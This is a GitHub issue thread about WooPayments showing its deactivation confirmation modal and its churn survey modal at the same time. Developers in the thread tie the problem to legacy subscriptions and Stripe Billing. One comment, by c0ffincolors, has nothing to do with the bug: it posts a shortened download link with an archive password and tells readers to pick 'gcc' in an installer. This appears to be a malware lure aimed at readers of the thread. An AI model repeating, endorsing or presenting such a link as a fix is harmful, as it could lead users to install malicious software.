### ISSUE TITLE
Churn survey modal and "Are you sure" de-activation modal are displayed at the same time

### ISSUE THREAD

**Issue by pierorocca** [Automattic/woocommerce-payments#9347]
### Describe the bug
When a merchant de-activates WooPayments, the "are you sure" modal and the churn survey modal appear at the same time. The experience looks broken.

Additionally, unchecking "Enable WooPayments" from the Payment Settings does not trigger the churn survey. 

### To Reproduce
1. Navigate to the plugin page
2. Click deactivate WooPayments plugin
3. Observe that both modals appear at the same time

### Expected behavior
1. First, the "are you sure" modal is displayed 
2. After the user clicks "yes", the churn survey modal is shown.

3. Additionally, if the merchant disables WooPayments from the settings page, the churn survey modal should show on save.
- Double check that unchecking WooPay first, and then unchecking "enable WooPayments" doesn't cause two churn surveys to display. In that scenario, the WooPayments survey should only be shown.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by vladolaru** [comment]
Further context about the scenario when this happens: it is related to the _legacy_ WCPay Subscriptions functionality. Without having that in use, the "Are you sure?" modal is not shown, only the exit survey is.

**Comment by anu-rock** [comment]
I just tested on my local site and JN. I was greeted with only the exit survey. The "are you sure" modal did not appear.

@pierorocca If it's what @vladolaru described, do you agree that we should refactor this issue as a subscription bug?

**Comment by pierorocca** [comment]
There are two issues. One the survey doesn't trigger when disabling the gateway, only on deactivation of the plugin.  The second is it sounds like there's contention between an older plugin and the new survey. Imo the survey trigger should account for both scenarios. Do we have a sense of size? I wouldn't say this is on subscriptions to fix.

**Comment by AashikP** [comment]
I see two modals since I have Stripe billing Subscriptions active:

![Image](https://github.com/user-attachments/assets/94cf471f-a576-4e3d-8df4-223c9b61b94f)

I close close them both, but this scenario is not very user-friendly.

**Comment by vladolaru** [comment]
That is very ugly indeed @AashikP. However, we need to consider that we no longer use the WC Subscriptions subset shipped with WooPayments (the built-in subscriptions).

**Comment by AashikP** [comment]
> we need to consider that we no longer use the WC Subscriptions subset shipped with WooPayments

Fair point!
